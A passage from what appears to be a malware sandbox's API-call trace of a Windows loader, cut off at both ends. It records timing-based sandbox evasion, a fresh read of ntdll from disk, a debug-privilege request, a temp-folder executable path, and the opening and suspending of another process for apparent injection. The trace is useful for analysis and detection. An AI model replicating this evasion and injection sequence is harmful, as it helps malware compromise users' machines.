(lpMsg=0x12fe58) returned 0x0 [0057.685] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.685] IsWindow (hWnd=0x601a8) returned 1 [0057.685] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.685] IsIconic (hWnd=0x601a8) returned 0 [0057.685] GetParent (hWnd=0x601a8) returned 0x0 [0057.685] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.685] DispatchMessageA (lpMsg=0x12fe58) [0057.685] IsIconic (hWnd=0x601a8) returned 0 [0057.685] IsIconic (hWnd=0x601a8) returned 0 [0057.685] BeginPaint (in: hWnd=0x601a8, lpPaint=0x12fa1c | out: lpPaint=0x12fa1c) returned 0x2a0107b2 [0057.685] GetClientRect (in: hWnd=0x601a8, lpRect=0x12fa5c | out: lpRect=0x12fa5c) returned 1 [0057.685] OleTranslateColor () returned 0x0 [0057.685] OleTranslateColor () returned 0x0 [0057.685] CreateSolidBrush (color=0xf0f0f0) returned 0xf110078f [0057.685] OleTranslateColor () returned 0x0 [0057.685] OleTranslateColor () returned 0x0 [0057.685] SetTextColor (hdc=0x2a0107b2, color=0x0) returned 0x0 [0057.685] SetBkColor (hdc=0x2a0107b2, color=0xf0f0f0) returned 0xf0f0f0 [0057.685] FillRect (hDC=0x2a0107b2, lprc=0x12fa5c, hbr=0xf110078f) returned 1 [0057.685] SetTextColor (hdc=0x2a0107b2, color=0x0) returned 0x0 [0057.685] SetBkColor (hdc=0x2a0107b2, color=0xf0f0f0) returned 0xf0f0f0 [0057.685] EndPaint (hWnd=0x601a8, lpPaint=0x12fa1c) returned 1 [0057.685] DefWindowProcA (hWnd=0x601a8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0057.686] DefWindowProcA (hWnd=0x601a8, Msg=0xd, wParam=0xc, lParam=0x1b73458) returned 0xb [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x1e0e6c, cchWideChar=12 | out: lpWideCharStr="Delstaterne") returned 12 [0057.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MS Sans Serif", cchWideChar=-1, lpMultiByteStr=0x12f75c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS Sans Serif", lpUsedDefaultChar=0x0) returned 14 [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0057.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b73458, cbMultiByte=-1, lpWideCharStr=0x1e0e94, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0057.687] VarBstrCmp (bstrLeft="Delstaterne", bstrRight="MS Sans Serif", lcid=0x0, dwFlags=0x30001) returned 0x0 [0057.687] IsWindowVisible (hWnd=0x601a8) returned 1 [0057.687] IsIconic (hWnd=0x601a8) returned 0 [0057.687] IsZoomed (hWnd=0x601a8) returned 0 [0057.687] ShowWindow (hWnd=0x601a8, nCmdShow=0) returned 1 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f3b0) returned 0x0 [0057.687] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f3b0) returned 0x0 [0057.687] GetParent (hWnd=0x601a8) returned 0x0 [0057.687] GetWindowRect (in: hWnd=0x601a8, lpRect=0x12eff0 | out: lpRect=0x12eff0) returned 1 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x47, wParam=0x0, lParam=0x12f3b0) returned 0x0 [0057.687] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 100663296 [0057.687] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f060 | out: lpRect=0x12f060) returned 1 [0057.687] MapWindowPoints (in: hWndFrom=0x601a8, hWndTo=0x0, lpPoints=0x12f060, cPoints=0x2 | out: lpPoints=0x12f060) returned 17629216 [0057.687] DefWindowProcA (hWnd=0x601a8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0057.687] GetFocus () returned 0x601a8 [0057.687] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x12f044 | out: lpWndClass=0x12f044) returned 1 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x1c, wParam=0x0, lParam=0x960) returned 0x0 [0057.688] DefWindowProcA (hWnd=0x301fc, Msg=0x1c, wParam=0x0, lParam=0x960) returned 0x0 [0057.688] GetWindowLongA (hWnd=0x401e4, nIndex=0) returned 28713116 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0057.688] DefWindowProcA (hWnd=0x601a8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0057.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.688] LoadLibraryA (lpLibFileName="NTDLL") returned 0x76f50000 [0057.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.688] GetProcAddress (hModule=0x76f50000, lpProcName="ZwSetInformationProcess") returned 0x76f96678 [0057.688] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] GetProcAddress (hModule=0x76c10000, lpProcName="Sleep") returned 0x76c5ba46 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="user32") returned 0x76620000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] GetProcAddress (hModule=0x76620000, lpProcName="GetDesktopWindow") returned 0x766301a9 [0057.690] GetDesktopWindow () returned 0x10010 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] GetProcAddress (hModule=0x76c10000, lpProcName="HeapAlloc") returned 0x76fa2dd6 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.690] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.690] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.691] GetProcAddress (hModule=0x76c10000, lpProcName="SetLastError") returned 0x76c5bb08 [0057.691] SetLastError (dwErrCode=0x5) [0057.691] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.691] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0057.691] SetErrorMode (uMode=0x8001) returned 0x8001 [0057.691] GetProcAddress (hModule=0x76c10000, lpProcName="SetErrorMode") returned 0x76c64a51 [0057.691] SetErrorMode (uMode=0x400) returned 0x8001 [0057.691] SetErrorMode (uMode=0x0) returned 0x400 [0057.691] SetErrorMode (uMode=0x8001) returned 0x0 [0057.691] LoadLibraryA (lpLibFileName="ntdll") returned 0x76f50000 [0057.691] SetErrorMode (uMode=0x0) returned 0x8001 [0057.691] GetProcAddress (hModule=0x76f50000, lpProcName="NtYieldExecution") returned 0x76f96aa8 [0057.691] Sleep (dwMilliseconds=0xf) [0057.694] NtYieldExecution () returned 0x0 [0057.711] Sleep (dwMilliseconds=0xf) [0057.735] NtYieldExecution () returned 0x0 [0057.736] Sleep (dwMilliseconds=0xf) [0057.741] NtYieldExecution () returned 0x0 [0057.759] Sleep (dwMilliseconds=0xf) [0057.795] NtYieldExecution () returned 0x0 [0057.796] Sleep (dwMilliseconds=0xf) [0057.803] NtYieldExecution () returned 0x40000024 [0057.803] Sleep (dwMilliseconds=0xf) [0057.822] NtYieldExecution () returned 0x40000024 [0057.822] Sleep (dwMilliseconds=0xf) [0057.834] NtYieldExecution () returned 0x40000024 [0057.834] Sleep (dwMilliseconds=0xf) [0057.853] NtYieldExecution () returned 0x40000024 [0057.853] Sleep (dwMilliseconds=0xf) [0057.873] NtYieldExecution () returned 0x40000024 [0057.873] Sleep (dwMilliseconds=0xf) [0057.881] NtYieldExecution () returned 0x40000024 [0057.881] Sleep (dwMilliseconds=0xf) [0057.898] NtYieldExecution () returned 0x40000024 [0057.898] Sleep (dwMilliseconds=0xf) [0057.912] NtYieldExecution () returned 0x40000024 [0057.912] Sleep (dwMilliseconds=0xf) [0057.928] NtYieldExecution () returned 0x40000024 [0057.928] Sleep (dwMilliseconds=0xf) [0057.944] NtYieldExecution () returned 0x40000024 [0057.944] Sleep (dwMilliseconds=0xf) [0057.959] NtYieldExecution () returned 0x40000024 [0057.959] Sleep (dwMilliseconds=0xf) [0057.975] NtYieldExecution () returned 0x40000024 [0057.975] Sleep (dwMilliseconds=0xf) [0057.990] NtYieldExecution () returned 0x40000024 [0057.990] Sleep (dwMilliseconds=0xf) [0058.006] NtYieldExecution () returned 0x40000024 [0058.006] Sleep (dwMilliseconds=0xf) [0058.022] NtYieldExecution () returned 0x40000024 [0058.022] Sleep (dwMilliseconds=0xf) [0058.037] NtYieldExecution () returned 0x40000024 [0058.037] Sleep (dwMilliseconds=0xf) [0058.053] NtYieldExecution () returned 0x0 [0058.053] Sleep (dwMilliseconds=0xf) [0058.069] NtYieldExecution () returned 0x40000024 [0058.069] Sleep (dwMilliseconds=0xf) [0058.084] NtYieldExecution () returned 0x40000024 [0058.084] Sleep (dwMilliseconds=0xf) [0058.100] NtYieldExecution () returned 0x40000024 [0058.100] Sleep (dwMilliseconds=0xf) [0058.115] NtYieldExecution () returned 0x0 [0058.115] Sleep (dwMilliseconds=0xf) [0058.131] NtYieldExecution () returned 0x40000024 [0058.131] Sleep (dwMilliseconds=0xf) [0058.147] NtYieldExecution () returned 0x40000024 [0058.147] Sleep (dwMilliseconds=0xf) [0058.162] NtYieldExecution () returned 0x40000024 [0058.162] Sleep (dwMilliseconds=0xf) [0058.178] NtYieldExecution () returned 0x40000024 [0058.178] Sleep (dwMilliseconds=0xf) [0058.194] NtYieldExecution () returned 0x40000024 [0058.194] Sleep (dwMilliseconds=0xf) [0058.209] NtYieldExecution () returned 0x40000024 [0058.209] Sleep (dwMilliseconds=0xf) [0058.225] NtYieldExecution () returned 0x40000024 [0058.225] Sleep (dwMilliseconds=0x1f40) [0066.228] SetErrorMode (uMode=0x8001) returned 0x0 [0066.228] LoadLibraryA (lpLibFileName="ntdll") returned 0x76f50000 [0066.228] SetErrorMode (uMode=0x0) returned 0x8001 [0066.229] GetProcAddress (hModule=0x76f50000, lpProcName="NtProtectVirtualMemory") returned 0x76f95f18 [0066.229] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12d7c4*=0x76f51000, NumberOfBytesToProtect=0x12d7c8, NewAccessProtection=0x40, OldAccessProtection=0x12d7cc | out: BaseAddress=0x12d7c4*=0x76f51000, NumberOfBytesToProtect=0x12d7c8, OldAccessProtection=0x12d7cc*=0x20) returned 0x0 [0066.235] SetErrorMode (uMode=0x8001) returned 0x0 [0066.235] LoadLibraryA (lpLibFileName="advapi32") returned 0x754d0000 [0066.235] SetErrorMode (uMode=0x0) returned 0x8001 [0066.235] GetProcAddress (hModule=0x754d0000, lpProcName="RegOpenKeyExA") returned 0x754e4907 [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="advapi32") returned 0x754d0000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x754d0000, lpProcName="RegQueryValueExA") returned 0x754e48ef [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="advapi32") returned 0x754d0000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x754d0000, lpProcName="RegCloseKey") returned 0x754e469d [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x76c10000, lpProcName="CreateFileA") returned 0x76c5cee8 [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x76c10000, lpProcName="WriteFile") returned 0x76c61400 [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.236] SetErrorMode (uMode=0x0) returned 0x8001 [0066.236] GetProcAddress (hModule=0x76c10000, lpProcName="CloseHandle") returned 0x76c5ca7c [0066.236] SetErrorMode (uMode=0x8001) returned 0x0 [0066.236] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="ReadFile") returned 0x76c596fb [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="GetFileSize") returned 0x76c50273 [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="UnmapViewOfFile") returned 0x76c5db13 [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualProtectEx") returned 0x76c9f5d9 [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.237] GetProcAddress (hModule=0x76c10000, lpProcName="GetLongPathNameA") returned 0x76c9f47f [0066.237] SetErrorMode (uMode=0x8001) returned 0x0 [0066.237] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.237] SetErrorMode (uMode=0x0) returned 0x8001 [0066.238] GetProcAddress (hModule=0x76c10000, lpProcName="TerminateProcess") returned 0x76c52331 [0066.238] SetErrorMode (uMode=0x8001) returned 0x0 [0066.238] LoadLibraryA (lpLibFileName="IPHlpApi") returned 0x733c0000 [0066.240] SetErrorMode (uMode=0x0) returned 0x8001 [0066.240] GetProcAddress (hModule=0x733c0000, lpProcName="GetAdaptersInfo") returned 0x733c9263 [0066.240] SetErrorMode (uMode=0x8001) returned 0x0 [0066.240] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c10000 [0066.240] SetErrorMode (uMode=0x0) returned 0x8001 [0066.240] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAllocEx") returned 0x76c4c1b6 [0066.240] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0066.241] GetAdaptersInfo (in: AdapterInfo=0x3a0000, SizePointer=0x12d7d4 | out: AdapterInfo=0x3a0000, SizePointer=0x12d7d4) returned 0x0 [0066.247] SetErrorMode (uMode=0x8001) returned 0x0 [0066.247] LoadLibraryA (lpLibFileName="shell32") returned 0x75810000 [0066.251] SetErrorMode (uMode=0x0) returned 0x8001 [0066.251] GetProcAddress (hModule=0x75810000, lpProcName="ShellExecuteA") returned 0x75a57078 [0066.251] SetErrorMode (uMode=0x8001) returned 0x0 [0066.251] LoadLibraryA (lpLibFileName="User32") returned 0x76620000 [0066.251] SetErrorMode (uMode=0x0) returned 0x8001 [0066.251] GetProcAddress (hModule=0x76620000, lpProcName="EnumWindows") returned 0x7663375b [0066.251] EnumWindows (lpEnumFunc=0x12db4f, lParam=0x12d878) returned 1 [0066.253] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x2200000 [0066.263] SetErrorMode (uMode=0x8001) returned 0x0 [0066.263] LoadLibraryA (lpLibFileName="user32") returned 0x76620000 [0066.263] SetErrorMode (uMode=0x0) returned 0x8001 [0066.263] GetProcAddress (hModule=0x76620000, lpProcName="DestroyWindow") returned 0x7662b2f4 [0066.263] SetErrorMode (uMode=0x8001) returned 0x0 [0066.263] LoadLibraryA (lpLibFileName="user32") returned 0x76620000 [0066.263] SetErrorMode (uMode=0x0) returned 0x8001 [0066.263] GetProcAddress (hModule=0x76620000, lpProcName="EnumThreadWindows") returned 0x7662b712 [0066.263] EnumThreadWindows (dwThreadId=0xb88, lpfn=0x12dc7a, lParam=0x7662b2f4) returned 0 [0066.263] DestroyWindow (hWnd=0x601a8) returned 1 [0066.263] DefWindowProcA (hWnd=0x601a8, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0066.264] SendMessageA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x80175 [0066.264] DefWindowProcA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x80175 [0066.264] DestroyCursor (hCursor=0x80175) returned 1 [0066.264] SelectObject (hdc=0x2a0107b2, h=0x18a002e) returned 0x220a080f [0066.264] DefWindowProcA (hWnd=0x601a8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0066.264] SelectObject (hdc=0x2a0107b2, h=0x18a002e) returned 0x18a002e [0066.264] SelectObject (hdc=0x2a0107b2, h=0x1b00016) returned 0x2430092c [0066.265] DeleteObject (ho=0x2430092c) returned 1 [0066.265] SelectObject (hdc=0x2a0107b2, h=0x1900015) returned 0x1900015 [0066.265] SelectObject (hdc=0x2a0107b2, h=0x1900015) returned 0x1900015 [0066.265] ReleaseDC (hWnd=0x601a8, hDC=0x2a0107b2) returned 1 [0066.265] DefWindowProcA (hWnd=0x601a8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0066.265] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0066.267] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x2a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0066.269] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x2200c00 | out: lpflOldProtect=0x2200c00*=0x2) returned 1 [0066.272] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0x28a00, flNewProtect=0x20, lpflOldProtect=0x2200c00 | out: lpflOldProtect=0x2200c00*=0x40) returned 1 [0066.273] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2200c00 | out: lpflOldProtect=0x2200c00*=0x40) returned 1 [0066.288] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x12f250 | out: HeapArray=0x12f250*=0x1c0000) returned 0x9 [0066.294] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x12f200, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0066.295] NtCreateFile (in: FileHandle=0x12f220, DesiredAccess=0x120089, ObjectAttributes=0x12f1e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x12f208, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x12f220*=0x120, IoStatusBlock=0x12f208*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0066.304] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x12f208, FileInformation=0x12f160, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x12f208, FileInformation=0x12f160) returned 0x0 [0066.319] NtReadFile (in: FileHandle=0x120, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x12f208, Buffer=0xa200020, BufferLength=0x13a928, ByteOffset=0x12f178*=0, Key=0x0 | out: IoStatusBlock=0x12f208, Buffer=0xa200020*) returned 0x0 [0066.343] NtClose (Handle=0x120) returned 0x0 [0066.385] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x12f1a8, FileInformation=0x12ef1c, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x12f1a8, FileInformation=0x12ef1c) returned 0x0 [0066.385] NtClose (Handle=0x120) returned 0x0 [0066.616] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x12f234, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x12f234, ResultLength=0x0) returned 0x0 [0066.620] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x12f258, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x12f258, ReturnLength=0x0) returned 0x0 [0066.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12eee8*=0x0, ZeroBits=0x0, RegionSize=0x12eeec*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x12eee8*=0x3b0000, RegionSize=0x12eeec*=0x10000) returned 0x0 [0066.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3b0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3b0000, ResultLength=0x0) returned 0x0 [0066.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x12f248*=0x3b0000, RegionSize=0x12f24c, FreeType=0x8000) returned 0x0 [0066.662] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12f004 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0066.665] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x12f260 | out: TokenHandle=0x12f260*=0x120) returned 0x0 [0066.668] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12f254 | out: lpLuid=0x12f254*(LowPart=0x14, HighPart=0)) returned 1 [0066.670] NtAdjustPrivilegesToken (in: TokenHandle=0x120, DisableAllPrivileges=0, NewState=0x12f250, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0066.671] NtClose (Handle=0x120) returned 0x0 [0066.671] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12e82c | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0066.679] RtlSetEnvironmentVariable (in: Environment=0x0, Name="664908S9", Value="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" | out: Environment=0x0) returned 0x0 [0066.681] NtCreateSection (in: SectionHandle=0x12ed2c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x12eacc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x12ed2c*=0x120) returned 0x0 [0066.684] NtMapViewOfSection (in: SectionHandle=0x120, ProcessHandle=0xffffffff, BaseAddress=0x12ed30*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x12eacc*=0x29a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x12ed30*=0x3b0000, SectionOffset=0x0, ViewSize=0x12eacc*=0x2a000) returned 0x0 [0066.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12e434*=0x0, ZeroBits=0x0, RegionSize=0x12e438*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x12e434*=0x3e0000, RegionSize=0x12e438*=0x10000) returned 0x0 [0066.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3e0000, ResultLength=0x0) returned 0x0 [0066.690] NtOpenProcess (in: ProcessHandle=0x12ea88, DesiredAccess=0x438, ObjectAttributes=0x12eaa8*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x12ea7c*(UniqueProcess=0x610, UniqueThread=0x0) | out: ProcessHandle=0x12ea88*=0x128) returned 0x0 [0066.692] NtOpenThread (in: ThreadHandle=0x12ea84, DesiredAccess=0x1a, ObjectAttributes=0x12e41c, ClientId=0x12e434*(UniqueProcess=0x0, UniqueThread=0x614) | out: ThreadHandle=0x12ea84*=0x12c) returned 0x0 [0066.696] NtSuspendThread (in: ThreadHandle=0x12c, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0066.699] NtGetContextThread (in: ThreadHandle=0x12c, Context=0x12e798 | out: Context=0x12e798*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x0, Ecx=0xf, Eax=0x27407d0, Ebp=0x1afaac, Eip=0x76f970b4, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, 